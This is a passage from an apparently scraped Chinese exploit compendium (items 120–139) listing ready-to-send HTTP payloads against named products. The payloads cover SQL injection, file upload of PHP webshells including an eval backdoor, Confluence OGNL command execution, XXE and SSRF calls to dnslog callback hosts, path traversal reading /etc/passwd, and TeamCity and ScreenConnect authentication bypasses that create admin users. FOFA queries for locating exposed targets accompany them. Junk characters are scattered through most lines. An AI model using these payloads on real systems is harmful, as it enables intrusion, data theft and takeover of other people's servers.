X-Forwarded-For: 1.1.1.1$ e8 Q/ {' S' G" X' l5 O @
X-Originating-Ip: 1.1.1.1
. T7 b- s' S0 ^: b# p* I! C& mX-Remote-Ip: 1.1.1.1
4 w! Q( ^! ^) L* P( V, dX-Remote-Addr: 1.1.1.1
( X1 O! N8 p( h. w7 uTe: trailers
( d& l! ]% d# RConnection: close
3 g1 w6 Q H$ b' D% J5 p0 K- p
+ b u0 U/ [4 Wsrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
" z) w8 o+ F* X' P3 P" w" D
3 I) J( I4 Z1 W/ O' C& @7 X
4 M& W; o% G1 B% y5 u1 S120. 北京百绰智能S40管理平台导入web.php任意文件上传
4 A3 f5 Q! B. k) G7 Y6 `CVE-2024-1253
4 m) W1 c! F% e+ E. VFOFA:title="Smart管理平台"
+ e7 L" x, Q% [, J* OPOST /useratte/web.php? HTTP/1.1: _* P" z7 W7 f0 W
Host: ip:port3 s3 G9 b9 I! r. I
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db9 Z- k: ?; O: X1 g# C
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko% K# K- S W' X: i' t- B& D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 w( _* R+ |; P' D' K$ sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# X/ N/ v/ i* |Accept-Encoding: gzip, deflate
! ]; l! c+ Q% q' d! Y# I" fContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
8 t. v6 E, C( r) r; m2 vContent-Length: 597
3 T$ v& d4 S* b# u" n3 t# ]Origin: https://ip:port7 F, o j9 c; X5 ^ w F! m5 f
Referer: https://ip:port/sysmanage/licence.php
- O' s, ?! Y; e" e ]' o5 i- {Upgrade-Insecure-Requests: 1
2 x% Q& Z# c& eSec-Fetch-Dest: document
+ M; r7 x) r4 e+ Y' aSec-Fetch-Mode: navigate6 y5 D6 _& h* f; N' I& p
Sec-Fetch-Site: same-origin3 `8 M& \: \+ }2 ^/ \
Sec-Fetch-User: ?10 b) l: m5 s6 \& m7 P
Te: trailers
) t! ^0 R( {& l& L qConnection: close- s) U; T# ^# \! u! m! X
8 P+ M! d' t7 }" R
-----------------------------42328904123665875270630079328& j' f2 D8 R& b" w
Content-Disposition: form-data; name="file_upload"; filename="2.php" d! j4 Q' i) h% }) G& V
Content-Type: application/octet-stream
9 j! Y" i% Z, |- ^0 u1 E4 W
, P: {% z+ a$ @6 @<?php phpinfo()?>
1 w( S2 x5 [! t" X* x-----------------------------423289041236658752706300793283 {) X/ |4 ?5 G
Content-Disposition: form-data; name="id_type"
( ^" s5 F* l4 S$ d7 S
$ O9 M! ]0 t# K3 [# ~' n, I; F3 n' k10 u3 d" M; E6 \* i9 I
-----------------------------42328904123665875270630079328& n& N$ U+ s& O: [
Content-Disposition: form-data; name="1_ck"8 ~5 `, k9 k9 u8 `& p! U
+ A4 d" c# M9 q: b
1_radhttp
, d, E" v' ]1 a [-----------------------------42328904123665875270630079328+ \/ M) H, O5 n% d$ @
Content-Disposition: form-data; name="mode"
' M& r, K6 `' b6 I. P% s0 S% Y7 g( f& `5 K9 o
import
* n& f( F. `/ N0 ?, D- Z4 q0 h-----------------------------42328904123665875270630079328. e/ g3 P/ v. V$ F' ?$ o4 `% d+ E! ]1 f
; u* l* X$ P2 M0 M& n
/ k" J$ a9 i) q5 a' _, i }% u" P文件路径/upload/2.php6 J" q% V& v( C9 j
6 U, G, \4 J3 m/ w; F121. 北京百绰智能S42管理平台userattestation.php任意文件上传
6 \- B7 k$ K& q# }5 K. WCVE-2024-1918
# k/ F6 g5 n- V( v4 K$ hFOFA:title="Smart管理平台"
- p( e" ]6 I* WPOST /useratte/userattestation.php HTTP/1.1
- y0 r) b5 g* J) [$ h# pHost: 192.168.40.130:8443
5 ~0 K5 x9 p/ z# c# h1 tCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50+ H. u) O8 v/ L
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
% V9 N9 u8 s) ?$ V. Q: A4 O3 lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ X" K5 Q1 a+ ~, J
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 s+ ]* ~ E4 E) j* h' ~
Accept-Encoding: gzip, deflate
) }+ ^ E O% P& }$ p# ^Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
# J+ B$ J# M* E/ q* I0 zContent-Length: 592
* U/ @: u/ x" f4 q9 |* ZOrigin: https://192.168.40.130:8443, K- m! u/ |3 _/ Q
Upgrade-Insecure-Requests: 1
" X# l4 @$ s% M" iSec-Fetch-Dest: document
0 W o# X4 o r( \0 MSec-Fetch-Mode: navigate$ f m/ A f# A9 \# \9 P
Sec-Fetch-Site: same-origin* {! G4 v3 h4 r( H9 R8 a6 \
Sec-Fetch-User: ?1
) z2 S2 B& L5 Y+ Q( WTe: trailers
. I! p3 f( ]8 w+ JConnection: close7 v& m# f9 ?1 p8 C. {
3 K# D* f$ z+ s-----------------------------42328904123665875270630079328' }4 W) Y/ W( Z. g* k& q& |4 b
Content-Disposition: form-data; name="web_img"; filename="1.php"
6 {. V: e8 t3 @- B& y" Q, V" g9 u( t2 TContent-Type: application/octet-stream! _5 y: U5 R$ O" m
& M5 s1 X4 t, R7 x+ w' t. L
<?php phpinfo();?>
$ T0 i. W2 ~8 R" l+ k-----------------------------42328904123665875270630079328; K9 t" ~# n5 f! `* b; t( @2 o
Content-Disposition: form-data; name="id_type"8 P7 e% Y8 @4 Z8 h
4 j' n$ {: ]# ?4 q1 S% d7 b4 D- N& ]0 [# | E" n! l
-----------------------------42328904123665875270630079328
6 \+ m$ {) a) D6 W5 p6 g- @Content-Disposition: form-data; name="1_ck"
& o) A |2 G, z9 S/ f& d4 m/ h* I1 v! |7 U" i3 I0 Y
1_radhttp
" E2 k- z2 P6 {2 `8 N& H-----------------------------42328904123665875270630079328* p' \# _$ p9 q/ u: j' L! U
Content-Disposition: form-data; name="hidwel"
; E: k/ P9 ?% ^- Q
$ P) C3 r( Y0 T6 y# e7 \& f& X! v* bset
% c1 h$ S# Y+ y) b. |# l-----------------------------423289041236658752706300793287 A# V8 P6 u( y! y+ p* @( ^
: Q x, o$ J1 H6 I k
8 C, J* T) N2 i+ H J" V7 Iboot/web/upload/weblogo/1.php
9 }1 w) l2 G) Y/ V- g+ r3 d" z- T9 N/ i8 m* r: A
122. 北京百绰智能s200管理平台/importexport.php sql注入
: G& I1 I% h7 Q" n& V5 @CVE-2024-27718FOFA:title="Smart管理平台"
; Q; O: P x# C. Z) O其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
! y9 c% L6 Y9 eGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1! S3 i) Q! G1 t' ^( c9 U T1 c
Host: x.x.x.x, M/ B( n7 [- F5 a% V. R
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc06 [9 p. T* T) ~& r% P1 w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
/ Y7 F7 p7 }$ Y+ R6 ^2 M! ]6 R: ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# Y6 d* K3 r# n4 N1 {' bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 R0 A) b) B* E% r) V: G) xAccept-Encoding: gzip, deflate, br) v5 D; K+ L6 H
Upgrade-Insecure-Requests: 1
$ x1 X5 T) M" t1 \) ]) z9 c* `' vSec-Fetch-Dest: document3 D) Z7 v% k1 s$ Q
Sec-Fetch-Mode: navigate% i f' k; E+ o/ I# \! H# w
Sec-Fetch-Site: none
, y/ C* b& n4 `2 h0 Y qSec-Fetch-User: ?1, h) q6 P$ r- Z
Te: trailers3 B. n* E/ x5 R. X+ _
Connection: close
# |; t% T, o5 `4 i" T! e; ^8 H$ m0 w+ h- v
. K) R3 K# _+ ~+ z) r
123. Atlassian Confluence 模板注入代码执行 F: q, f; o5 G3 j
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"; k! I" s% q s) L
POST /template/aui/text-inline.vm HTTP/1.1. H' o1 `4 @* [, V
Host: localhost:80906 W. t& H3 ?- _! H6 q
Accept-Encoding: gzip, deflate, br
) k. g' G5 _* ^! tAccept: */*
% q, U4 K( M1 @Accept-Language: en-US;q=0.9,en;q=0.83 l& y4 G) B8 m% D& H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36$ d$ x0 _6 u% w8 O1 t
Connection: close
5 U$ P+ t3 v3 _% HContent-Type: application/x-www-form-urlencoded5 Z, _+ L5 V- @
) |' q& H# y, B0 a/ ]label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
8 u* u7 o9 H `& u; Q& N& K8 [& A
2 K8 V6 }$ Y& W: r
124. 湖南建研工程质量检测系统任意文件上传
9 E# `$ w# q9 MFOFA:body="/Content/Theme/Standard/webSite/login.css"
" N" t5 V4 {2 k- XPOST /Scripts/admintool?type=updatefile HTTP/1.1# a2 U* z& O+ Z
Host: 192.168.40.130:8282% V% R& X& p p* Z4 f
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
' @ t) {, i0 E: `/ [ D* @Content-Length: 72
' N+ i! _# h6 k: k+ T$ A! v: yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
% r/ M0 K! E" i" g" aAccept-Encoding: gzip, deflate, br3 q; i5 s5 P U" {8 X; {
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, K' k- |- a- Q% K
Connection: close
j+ p+ c& @4 Y$ b m0 R* B9 JContent-Type: application/x-www-form-urlencoded
# t! M8 S- g$ A. d+ |( N o8 ?/ a8 F" a T/ j9 w, _
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
! c. g: u7 x' h; C$ m: f0 e m9 c' h* K
* {+ K. X8 B+ x
http://192.168.40.130:8282/Scripts/abcgcg.aspx8 M6 z9 d/ g. k0 X7 X( w
2 y2 U9 O# f4 o5 X$ n: ?
125. ConnectWise ScreenConnect身份验证绕过4 L, G5 l1 y+ |6 X: g
CVE-2024-1709" t d. X, y7 c |$ y
FOFA:icon_hash="-82958153"( V4 ], ^' k6 A
https://github.com/watchtowrlabs ... bypass-add-user-poc7 ? a. [0 K9 E" o* T
9 |+ I0 [# j# Y6 s+ u" t* J/ ~& x b" L3 F- j
使用方法0 ]5 Z* h9 S6 ?2 Q1 @
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
- l1 u) P5 w( Q8 O* E! I' k* P; C6 T. N" {
% G" r: f3 l- |* K; g创建好用户后直接登录后台,可以执行系统命令。
6 ~, A% y0 C9 b1 L! R) V+ N# ]5 G% Y$ K
126. Aiohttp 路径遍历$ J M7 ?* ~5 b( @; j9 z
FOFA:title=="ComfyUI"
. a+ A: w* K7 a3 L( Y3 |GET /static/../../../../../etc/passwd HTTP/1.15 N j4 K' n8 _! k: s& a
Host: x.x.x.x E+ }) {# t V- l0 k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.367 D9 [4 ~1 g. K; Z" m
Connection: close" L( t0 v' C( c' J9 f1 W, V
Accept: */*, N5 n2 e7 l. g
Accept-Language: en
2 U+ e2 v4 [2 ^8 e9 L& bAccept-Encoding: gzip
$ ]$ l ~- ~7 I' y. e+ E8 N
1 w, a# h: r/ N) G& z
4 T' k) z p, `# ]8 ~127. 广联达Linkworks DataExchange.ashx XXE
- R8 o5 r! A a5 ZFOFA:body="Services/Identification/login.ashx" 7 y9 W4 H1 B/ q" F
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
2 `2 F4 f3 b! r' B9 E+ m H9 hHost: 192.168.40.130:8888
( d4 H% f$ j( M4 EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
; V$ v( r- o k, X7 ]3 _! I: [Content-Length: 4156 d! ^7 \& _ @( Z' _, \- r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; A" i) f; M- p! e/ M0 nAccept-Encoding: gzip, deflate0 k8 m0 T3 H, G/ H7 K
Accept-Language: zh-CN,zh;q=0.9
8 h+ k5 @5 k" zConnection: close3 G; d- G" B- @- D: s
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
3 @1 d4 B! P2 W( A8 d& _" NPurpose: prefetch
& Q! b+ W. B8 u4 D0 PSec-Purpose: prefetch;prerender- R: D# |2 c! t4 a
8 U |2 G9 |9 Y% O* l9 D/ ]0 C8 ~
------WebKitFormBoundaryJGgV5l5ta05yAIe06 _) f1 n# b$ w3 ]# @
Content-Disposition: form-data;name="SystemName"! ~6 D3 @3 K+ @" @
5 |+ s! @2 D' F/ P; gBIM3 R: o4 f4 p5 G9 L/ K5 F
------WebKitFormBoundaryJGgV5l5ta05yAIe0- x. Y/ K# K7 F: w! \; @" y( D
Content-Disposition: form-data;name="Params"* F) l+ \! Q9 Q) K: O) M
Content-Type: text/plain7 |3 P0 q' L1 z# ?! i
. p, i/ x' @. J8 s<?xml version="1.0" encoding="UTF-8"?>
( H' Y5 P* Z$ S+ ]& c& M$ R/ o<!DOCTYPE test [
. e: W) g& q- O6 v: h% y<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">" _( m* r F1 T
]' l& P' d. q6 H: K. v
>2 ]" J- X4 h" v
<test>&t;</test>
7 U! g t: h% F! i------WebKitFormBoundaryJGgV5l5ta05yAIe0--/ ] l% o( s6 A! v
% K* o" d% J: u4 y, c% q* P/ z- W4 ^, f) c8 ^" n/ i- M' @# U
9 N4 [( k5 ]# P128. Adobe ColdFusion 反序列化- K) w5 V2 `( a' e( K, E
CVE-2023-38203
0 l* S5 e* Q+ dAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
2 {* @9 t( q5 }1 oFOFA:app="Adobe-ColdFusion"
0 c+ a( A7 ~$ y1 R! D3 VPAYLOAD
! @6 d# r" {. J4 `, q6 V9 |4 K5 B" `- |$ D% E1 f @
129. Adobe ColdFusion 任意文件读取 f0 N# D+ K( Y1 Z( D
CVE-2024-20767
. S6 o! c: f; S% K0 G) r! k/ eFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"( _% f3 N7 o# G; D% I" C6 [
第一步,获取uuid* e& m* P$ x; O0 |
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1; i( l# B& U. R$ N' T
Host: x.x.x.x' Z& b! Q: e% A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36& |( {) D- O4 s
Accept: */*, }( F8 w% F# _2 J: E
Accept-Encoding: gzip, deflate* }7 R4 ^* e' H2 d! U
Connection: close" }! D! _: W9 ~
: p8 D) p6 @0 V6 l/ L& ?9 @4 Y
+ C4 y( ^5 D- S5 a$ i. @5 A) \第二步,读取/etc/passwd文件; L& x4 d( [, A$ v" i
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1! d1 a! v( Y& u5 Q) y# F
Host: x.x.x.x
5 n( L' d" W) ?5 d- _User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36$ f) g0 D% t) B& ~3 E3 z# }5 n
Accept: */*. L1 f" u" P/ o% C
Accept-Encoding: gzip, deflate- n: Q0 \! d: ^
Connection: close7 @( T2 t, n! J
uuid: 85f60018-a654-4410-a783-f81cbd5000b95 v1 H! B/ ?( W! L6 q% `) F
4 a; d6 ?6 U& R8 U& j4 K
% x# o" q) N: U; K6 h6 G130. Laykefu客服系统任意文件上传. r" F O3 K* c
FOFA:icon_hash="-334624619"
9 i# A& C! q# z2 `POST /admin/users/upavatar.html HTTP/1.10 k; Y8 `; e z( a! z$ q
Host: 127.0.0.1
. \0 V% p+ t# f _0 W" F# d4 IAccept: application/json, text/javascript, */*; q=0.01
1 V9 p7 y g8 T# g7 l, R7 q4 M6 P+ i UX-Requested-With: XMLHttpRequest
- J; z V( C! M$ F- CUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.262 _1 r0 V3 e& u6 I1 Y- z6 g
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
* I, c! R8 o6 y* k- a8 vAccept-Encoding: gzip, deflate
4 d& i) l1 Z4 [4 r M! h# wAccept-Language: zh-CN,zh;q=0.9
Q( _' `- e5 tCookie: user_name=1; user_id=3
* Q2 v0 c0 w1 ]3 N& |3 d: bConnection: close
5 m" [- j* N( Z/ X
! k7 o$ O2 {( B! l1 A3 e4 m, D------WebKitFormBoundary3OCVBiwBVsNuB2kR
* q, b7 c7 s4 ^4 z- ]" C/ uContent-Disposition: form-data; name="file"; filename="1.php"
) j( {$ G/ w& P a) mContent-Type: image/png
& B* P! x1 |0 {/ _9 F + p8 M! \( e. o/ `5 \9 j
<?php phpinfo();@eval($_POST['sec']);?>
/ d6 ~ t, d3 m) s& \" d$ y4 }------WebKitFormBoundary3OCVBiwBVsNuB2kR--- a( S- B; n: Q- ~
1 A. Q+ K9 p+ _0 Y; D+ F
$ w3 W% o" s# v* j' @131. Mini-Tmall <=20231017 SQL注入
) C" h# K! M) T7 Z+ aFOFA:icon_hash="-2087517259"+ j: N+ F/ S8 [4 S; ?# d) y* ]
后台地址:http://localhost:8080/tmall/admin
. S" }& `- R' f/ khttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)! t3 M. P3 [! j! h+ f. {
% R5 f. f2 _6 g: t5 H
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
1 a+ E" B. \: m' pCVE-2024-271982 |: E, G8 e% \& I" z! t. _8 S/ Y- x
FOFA:body="Log in to TeamCity") s+ E$ G6 X1 r
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
2 B3 k1 ^8 e$ i- y/ K8 wHost: 192.168.40.130:81119 ]& Y' T. R H, k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36, t& w' Z! F U5 X4 I
Accept: */*0 k# c* p4 X& v1 @% w3 G. H
Content-Type: application/json
$ H( G5 r, u; J9 \Accept-Encoding: gzip, deflate
! Y- H9 i% O9 Z+ l" x
2 M; o% J( i# m, o{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
, b6 D8 w% }) F" \8 b1 \, f3 a/ x% M7 J& c
. u( S5 `1 d3 jCVE-2024-27199! D$ Y4 r, s4 c) q( A) I4 }, x
/res/../admin/diagnostic.jsp3 z# u% e; \4 O: Z0 M; b
/.well-known/acme-challenge/../../admin/diagnostic.jsp# A6 N/ q. g3 ^& E8 C2 z) W+ T1 n
/update/../admin/diagnostic.jsp" K) [* Y8 v1 N
5 J: c; N4 [) [: @ L
6 M0 X0 z5 I5 |( Q& }: T6 fCVE-2024-27198-RCE.py
7 Y" Y' \6 k: i1 `, P
. x& D5 T; X+ O% ]9 A133. H5 云商城 file.php 文件上传0 O1 J$ o7 A! {" F p: e5 p8 V7 b# w
FOFA:body="/public/qbsp.php"
. I- U6 y) T0 S" L) sPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1- X- q/ t6 s6 ~* W/ p' }
Host: your-ip
2 |: c( q6 S, A9 CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36' S+ F- B* m" I" Y' q: Y
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
9 @- Q3 a4 p8 x5 e( c" V S. u3 j$ n+ S
------WebKitFormBoundaryFQqYtrIWb8iBxUCx5 g/ [$ [# ^3 T' n Z: a3 D/ t* E
Content-Disposition: form-data; name="file"; filename="rce.php"4 J! a9 K- s+ [! n2 X
Content-Type: application/octet-stream5 S" `$ @8 R. m1 j) t
% \4 e, X! E# ], y* R: \, P
<?php system("cat /etc/passwd");unlink(__FILE__);?>9 v4 D/ V/ t9 s! ` k
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
9 p' B. c! P/ s+ U* l. H. l
* p! @7 v! F" b5 X2 J
* N4 c! ~$ ~+ B! r+ I7 ~0 d |9 P- O! J9 V- ^0 U6 U) M Y% A
134. 网康NS-ASG应用安全网关index.php sql注入: n5 @6 q# L4 M. `2 n
CVE-2024-2330
g5 T7 O% X, nNetentsec NS-ASG Application Security Gateway 6.3版本5 Y4 O& s: F' L' W. k* L% S8 L# C
FOFA:app="网康科技-NS-ASG安全网关"; O D2 g( |8 V" Z% C, h' {
POST /protocol/index.php HTTP/1.1
9 W3 l8 \0 n8 y$ UHost: x.x.x.x. H) B5 m# j8 r5 a1 S1 r, X
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
/ W9 T; s0 j; M# wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
. {# h# g9 e h9 f M( ^- UAccept: */*1 n' @' |, b' @, f5 u" [ O8 n
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 m2 |6 K8 P, AAccept-Encoding: gzip, deflate) c5 |( @1 W2 J; u% B* P9 ^
Sec-Fetch-Dest: empty& R4 T9 f. r/ j; w/ Z" j d
Sec-Fetch-Mode: cors
$ j( z* \& } jSec-Fetch-Site: same-origin
0 S7 W/ k/ h- c" Q6 zTe: trailers9 j, b7 _. A' [8 z( U( g1 l2 O
Connection: close& I. P% e5 }2 v. {
Content-Type: application/x-www-form-urlencoded; \7 z r4 }7 y
Content-Length: 2637 @4 t1 e! w2 U: I, a( F" Q
[% { G, y$ W( [; }
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
6 M2 @( W, w) ?, o2 [6 ?1 t D# y. m, S! H% g) O
) H. w: K/ _% d1 A$ e/ O' C135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
3 ~' s1 u; Y$ k& g5 E' e6 xCVE-2024-20224 f- V4 l+ R. L# q% L
Netentsec NS-ASG Application Security Gateway 6.3版本& c$ ^- {4 Y& q
FOFA:app="网康科技-NS-ASG安全网关"' l2 @* {5 C/ T2 n9 y3 b' T
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
6 C5 H, O7 o) w9 a$ \- L9 z+ A/ i2 ?, HHost: x.x.x.x, D( G0 S6 v+ t3 _, b4 I8 Z- D$ e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36& Y8 b n) ^; s# k) ^6 v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 s& l- @% d9 V# x& w* Z, ?Accept-Encoding: gzip, deflate
9 {: e& n% z7 WAccept-Language: zh-CN,zh;q=0.9+ X6 ?* K, p9 O1 g$ v
Connection: close! u+ Z: _5 Q- a
7 Q( v Z& Y- F
& `. n% o- H4 K9 r136. NextChat cors SSRF
3 o9 E, R' i" @) j- OCVE-2023-49785
+ d1 B: m f0 _FOFA:title="NextChat"* D$ b6 B- N2 _/ {! C3 ?, A5 z
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1! I- e! V, z; s) a
Host: x.x.x.x:10000* p9 U# y% y' j0 m1 m
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36- o* q& t' A. D. x4 T) b) N
Connection: close. @+ r% T6 ~) {" I
Accept: */*
' m2 R* t! r* w! @* QAccept-Language: en7 |% H: G0 z/ f3 ?5 J& M
Accept-Encoding: gzip
9 C) m3 S- c) W7 i1 ?/ } H. \$ K! n2 T* J( E# a: Y
, q% M+ |9 E9 I0 Y+ Y5 c137. 福建科立迅通信指挥调度平台down_file.php sql注入
/ T! K( f% u5 Q9 V5 P: \CVE-2024-26200 P4 Z( _7 y0 J* v h2 }/ ?
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
! k: ^0 ]5 l e( HGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1* b; P; X* Q H
Host: x.x.x.x
) v; R b" ^0 x. k, @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0; \: [! P2 P9 b0 Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. F: n+ n8 i* _) m# Q8 ]3 [; j9 r* w
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 o1 W1 w' [6 O M+ i9 r
Accept-Encoding: gzip, deflate, br
. K/ Y5 m. p1 `4 B; EConnection: close
$ ~; ]$ G" r% L" ZCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj% N! h6 Z! h7 R
Upgrade-Insecure-Requests: 1% J1 I, l6 X ~, N
I! k7 E4 F* j/ ]
- y. f" A6 b5 p, w4 B8 ~, k/ ^0 X138. 福建科立讯通信指挥调度平台pwd_update.php sql注入+ i0 @) N- C& F' w
CVE-2024-26214 u+ `+ {/ _! m0 x) f! i! T ?$ i
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
8 t8 X! \% t4 [" j$ _' w+ lGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
* h2 x0 I: I: O3 s! E* tHost: x.x.x.x5 y' f# e3 M! x5 I; ]& \. t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
; _/ h9 Q$ D6 SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 n; K8 Y) D' J1 @" vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 h. A6 R/ Q" H! p, j+ Y0 ^
Accept-Encoding: gzip, deflate, br1 w0 |- z# f, \+ j: ^
Connection: close
4 ~: s* P, g2 H3 v7 yUpgrade-Insecure-Requests: 19 [, T# U/ d# r/ w" D! R
/ S g" Q3 \) l# k( d) N
( ~5 I9 ]9 E+ F, k o
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
% R+ }# Y/ D9 r: XCVE-2024-2622/ S z U& `! G' y: y; `
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
& C7 z) ~& y S' U" MGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
8 Z1 T, ^/ r8 y/ R' o7 G9 KHost: x.x.x.x
7 K \$ D/ b2 Z; i- i/ TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0( Q7 o' j2 i' o9 l. V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
